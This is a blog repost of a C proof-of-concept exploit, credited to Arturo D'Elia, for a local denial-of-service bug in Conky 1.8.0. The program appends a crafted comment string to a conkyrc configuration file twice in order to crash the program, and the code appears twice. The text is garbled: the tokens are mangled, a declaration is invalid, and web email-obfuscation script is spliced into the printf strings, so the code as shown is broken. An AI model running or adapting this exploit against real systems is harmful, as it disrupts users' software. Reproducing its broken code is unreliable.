/ * * // * Vulnerability Conky 1.8.0 on Linux * // * Tested on: Linux with kernel 2.6.32.1-smp * // * Found: by Arturo D'Elia * // * Date found: 12 Dec 2010 * // * Fix: No Fix * // * Contacts: arturo.delia @ libero.it <script type="text/javascript">/ * <! [CDATA [* /(Function () {try {var s, a, i, j, r, c, l = document.getElementById ("__cf_email__"); a = l.className; if (a) {s =''; r = parseInt (a.substr (0.2), 16); for (j = 2; a.length-j, j + = 2) {c = parseInt (a.substr (j, 2), 16) ^ r; s + = String.fromCharCode (c);} s = document.createTextNode (s); l.parentNode.replaceChild (s, l);}} catch (e ){}})();/ *]]> * /</ Script> * /
# Include <stdio.h># Include <stdlib.h># Include <string.h>
killyou char [] = "# w000wwwww i exploit it and i kill you!";
int main (int argc, char ** argv) {
FILE * fp;
/ * Write the information the program * /
printf ("\ n [*] Conky 1.8.0 Local DoS / Exploit PoC [*] \ n");
printf ("[*] coded by: Arturo D'Elia \ n ");
printf ("[*] Tested on: Linux \ n ");
printf ("[*] Kernel version: 2.6.32.1-smp \ n ");
printf ("[*] Bug Found: 12 Dec 2010 \ n ");
printf ("[*] Contacts: arturo.delia @ libero.it <script type="text/javascript">/ * <! [CDATA [* /(Function () {try {var s, a, i, j, r, c, l = document.getElementById ("__cf_email__"); a = l.className; if (a) {s =''; r = parseInt (a.substr (0.2), 16); for (j = 2; a.length-j, j + = 2) {c = parseInt (a.substr (j, 2), 16) ^ r; s + = String.fromCharCode (c);} s = document.createTextNode (s); l.parentNode.replaceChild (s, l);}} catch (e ){}})();/ *]]> * /</ Script> \ n \ n ");
/ * Check the input parameters * /
if (argc! = 2)
exit (fprintf (stderr, "Usage:% s <path conkyrc> \ n", argv [0]));
/ * Check the file exsist * /
printf ("[>] Open Conky configuration \ n ");
if ((fp = fopen (argv [1], "r "))== NULL)
exit (fprintf (stderr, "[x] Can not open% s file \ n", argv [1]));
fclose (fp);
/ * Open file for append and i send it the * /
/ * Exploited strings * /
fp = fopen (argv [1], "a");
printf ("[>] Send the DoS / PoC string \ n ");
fprintf (fp, "% s \ n", killyou);
fclose (fp);
/ * Wait 3 seconds * /
usleep (3000000);
/ * Resend exploited strings * /
fp = fopen (argv [1], "a");
fprintf (fp, "% s \ n", killyou);
fclose (fp);
/ * Ok guy. * /
printf ("[*] Ok guy, you kill it. \ n \ n ");return 0;}
# Include <stdio.h># Include <stdlib.h># Include <string.h>
killyou char [] = "# w000wwwww i exploit it and i kill you!";
int main (int argc, char ** argv) {
FILE * fp;
/ * Write the information the program * /
printf ("\ n [*] Conky 1.8.0 Local DoS / Exploit PoC [*] \ n");
printf ("[*] coded by: Arturo D'Elia \ n ");
printf ("[*] Tested on: Linux \ n ");
printf ("[*] Kernel version: 2.6.32.1-smp \ n ");
printf ("[*] Bug Found: 12 Dec 2010 \ n ");
printf ("[*] Contacts: arturo.delia @ libero.it <script type="text/javascript">/ * <! [CDATA [* /(Function () {try {var s, a, i, j, r, c, l = document.getElementById ("__cf_email__"); a = l.className; if (a) {s =''; r = parseInt (a.substr (0.2), 16); for (j = 2; a.length-j, j + = 2) {c = parseInt (a.substr (j, 2), 16) ^ r; s + = String.fromCharCode (c);} s = document.createTextNode (s); l.parentNode.replaceChild (s, l);}} catch (e ){}})();/ *]]> * /</ Script> \ n \ n ");
/ * Check the input parameters * /
if (argc! = 2)
exit (fprintf (stderr, "Usage:% s <path conkyrc> \ n", argv [0]));
/ * Check the file exsist * /
printf ("[>] Open Conky configuration \ n ");
if ((fp = fopen (argv [1], "r "))== NULL)
exit (fprintf (stderr, "[x] Can not open% s file \ n", argv [1]));
fclose (fp);
/ * Open file for append and i send it the * /
/ * Exploited strings * /
fp = fopen (argv [1], "a");
printf ("[>] Send the DoS / PoC string \ n ");
fprintf (fp, "% s \ n", killyou);
fclose (fp);
/ * Wait 3 seconds * /
usleep (3000000);
/ * Resend exploited strings * /
fp = fopen (argv [1], "a");
fprintf (fp, "% s \ n", killyou);
fclose (fp);
/ * Ok guy. * /
printf ("[*] Ok guy, you kill it. \ n \ n ");return 0;}
0 comments:
Post a Comment
WELLCOME MY WEB